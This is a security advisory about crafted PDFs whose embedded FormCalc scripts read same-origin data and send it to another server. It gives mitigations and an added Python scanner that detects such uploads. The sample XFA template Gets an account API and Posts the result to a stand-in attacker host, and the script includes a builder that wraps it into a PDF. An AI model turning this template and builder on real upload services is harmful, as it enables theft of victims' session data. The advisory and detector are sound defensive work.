Published:2016/11/18  Last Updated:2016/11/18

JVNTA#94087669
Using specially crafted PDF files to steal information

Overview

Embedding a script written in FormCalc in a PDF document allows that document to retrieve arbitrary content from the same origin where the PDF is hosted. When an attacker exploits this behavior against a web application or service that lets users upload arbitrary PDF files, sensitive information on the server may be stolen.

Products Affected

This issue exists under the following server / client combination:

Server: Allows users to upload PDF documents, and serves the uploaded files from the same origin as the application itself.
Client: IE11 or Firefox with the Adobe PDF plugin enabled

Description

PDF allows the creation of documents containing fill-in forms. To support this, PDF 1.5 and later support Adobe XML Forms Architecture (XFA), a specification defined by Adobe. In addition, a scripting language called FormCalc is available for dynamically performing calculations on values entered in a form. Using it, a program can be embedded in a PDF document.

For more information on FormCalc, including specifications, refer to the FormCalc User Reference provided by Adobe.

In addition to its arithmetic and other functions, FormCalc provides a group of functions called URL functions, among them Get(), Post() and Put(). Get() retrieves the content at the URL passed as its argument; Post() and Put() send data passed as an argument to the specified URL. In other words, a program embedded in a PDF can download content from the same origin and send it to a different origin.

This behavior is part of the Adobe XFA specification. An attacker exploiting it can carry out the attacks described in "PDF - Mess with the web":

(1)  (Attacker) Upload a PDF document with an embedded FormCalc script to the target server. The script is designed to retrieve sensitive data within the same origin using Get().
(1)' (Attacker) Trick a user into clicking a link to this PDF document.
(2)  (Victim) The PDF document is loaded in the web browser.
(2)' (Victim) FormCalc sends the Get() request in the victim's context and retrieves the sensitive data. Post() is then used to send this data to an external server.

Because the web browser sends the request in (2)', it may carry the victim's session cookie for that origin.
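
The following is an added example, not part of the original advisory and not JPCERT/CC or Adobe code. It shows what the script from steps (1) and (2)' looks like inside an XFA template, and a server-side check that a service accepting PDF uploads can run: it decodes each stream of an uploaded file and reports XFA packets whose FormCalc scripts call Get(), Post() or Put(). The sample PDFs, the XFA templates, and the hostnames and paths in them are constructed placeholders. The check is a detection aid that complements the separate-domain countermeasure in the Solution section rather than replacing it: it does not handle object streams, encrypted files, or filters other than FlateDecode, and a production pipeline should use a full PDF parser and treat anything it cannot decode as suspect.

```python
import re
import zlib

# Added example for this advisory (not JPCERT/CC or Adobe code).  All sample
# data below is constructed; hostnames and paths are placeholders.

# XFA template carrying the kind of FormCalc script described in steps (1)
# and (2)': Get() reads a same-origin resource, Post() ships it off-origin.
EXFIL_XFA = b"""<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
  <subform name="form1"><field name="f"><event activity="docReady">
    <script contentType="application/x-formcalc">
      var data = Get("https://app.example.com/api/account")
      Post("https://attacker.example/collect", data, "text/plain")
    </script>
  </event></field></subform>
</template>
</xdp:xdp>"""

# Benign template: FormCalc used for the arithmetic it was designed for.
SUM_XFA = b"""<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
  <subform name="form1"><field name="total"><calculate>
    <script contentType="application/x-formcalc">$ = Sum(qty * price)</script>
  </calculate></field></subform>
</template>
</xdp:xdp>"""


def build_pdf(xfa_xml: bytes, compress: bool = True) -> bytes:
    """Minimal single-page PDF whose AcroForm points at one XFA stream."""
    body = zlib.compress(xfa_xml) if compress else xfa_xml
    filt = b"/Filter /FlateDecode " if compress else b""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm << /XFA 4 0 R >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Length %d %s>>\nstream\n" % (len(body), filt) + body + b"\nendstream",
    ]
    out, offsets = bytearray(b"%PDF-1.7\n"), []
    for num, obj in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, obj)
    xref = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    out += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objs) + 1, xref)
    return bytes(out)


# "N G obj" followed by the stream dictionary.  The tempered dot stops the
# dictionary match at "endobj", so it cannot run on into a later object.
_STREAM_OBJ = re.compile(
    rb"\d+\s+\d+\s+obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n", re.S)
_DIRECT_LENGTH = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")
_FORMCALC = re.compile(
    rb'<script[^>]*contentType\s*=\s*"application/x-formcalc"[^>]*>(.*?)</script>',
    re.S | re.I)
# Case-insensitive on purpose: a spurious hit on "get(" is a cheap false
# positive, a missed Get() is a missed exfiltration.
_URL_FUNC = re.compile(rb"\b(get|post|put)\s*\(", re.I)


def iter_streams(pdf: bytes):
    """Yield (dictionary, decoded data) for each stream object.  Limits:
    object streams (/ObjStm), encrypted files and filters other than
    FlateDecode are not handled; treat what you cannot decode as suspect."""
    for m in _STREAM_OBJ.finditer(pdf):
        dic, start = m.group(1), m.end()
        ln = _DIRECT_LENGTH.search(dic)
        end = start + int(ln.group(1)) if ln else pdf.find(b"endstream", start)
        raw = pdf[start:end]
        if b"/FlateDecode" in dic:
            try:
                raw = zlib.decompress(raw)
            except zlib.error:
                pass  # undecodable stream: leave raw so the scan still sees it
        yield dic, raw


def scan_pdf(pdf: bytes) -> dict:
    """Report XFA presence, FormCalc script count and URL functions used."""
    scripts, url_funcs = 0, set()
    for _dic, data in iter_streams(pdf):
        for s in _FORMCALC.finditer(data):
            scripts += 1
            url_funcs.update(f.lower().decode() for f in _URL_FUNC.findall(s.group(1)))
    return {"has_xfa": b"/XFA" in pdf, "formcalc_scripts": scripts,
            "url_functions": sorted(url_funcs)}


def should_quarantine(findings: dict) -> bool:
    """Policy hook: hold for review any upload whose FormCalc calls Get/Post/Put."""
    return bool(findings["url_functions"])
```

Running scan_pdf(build_pdf(EXFIL_XFA)) reports one FormCalc script using get and post, so should_quarantine() returns True; the SUM_XFA document also contains a FormCalc script but no URL functions and passes. Whether to accept XFA forms in user uploads at all is a policy decision: since the behavior is by design, a service with no business need for XFA can simply reject any upload for which has_xfa is true.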

Adobe has addressed a similar threat in which the Same Origin Policy could be bypassed (CVE-2014-8453). However, Adobe has determined that this behavior within the same origin is expected. Web applications and users must account for it.

Attack methods are also described in PoC||GTFO 0x12 and in "PDF Special Function (FormCalc)".

Impact

The impact is comparable to stored XSS or CSRF.

In other words, an attacker may read sensitive content from the server in the victim's session, and may send forged requests that retrieve account information or change system settings.

Solution

User-side countermeasures
Disable the Adobe PDF plugin in the web browser (IE11, Firefox)

Server-side countermeasures
Serve user-uploaded PDF documents from a separate, sandboxed domain, i.e. an origin that shares neither session cookies nor sensitive content with the application.

Note that if the attacker embeds the PDF in a web page rather than linking to it, a Content-Disposition: attachment header on the HTTP response is ignored, so that header is not an effective countermeasure.

Vendor Status

Vendor          Status                     Last Update   Vendor Notes
BizMobile Inc.  Vulnerable, investigating  2016/11/18
Cybozu, Inc.    Vulnerable                 2016/11/18    Cybozu, Inc. website

References

  1. Adobe
    FormCalc User Reference
  2. OWASP AppSecEU 15
    PDF - Mess with the web
  3. International Journal of Proof-of-Concept or Get The Fuck Out (PoC||GTFO or PoC or GTFO)
    PoC||GTFO 0x12
  4. Hack Patch!
    PDF Special Function (FormCalc)
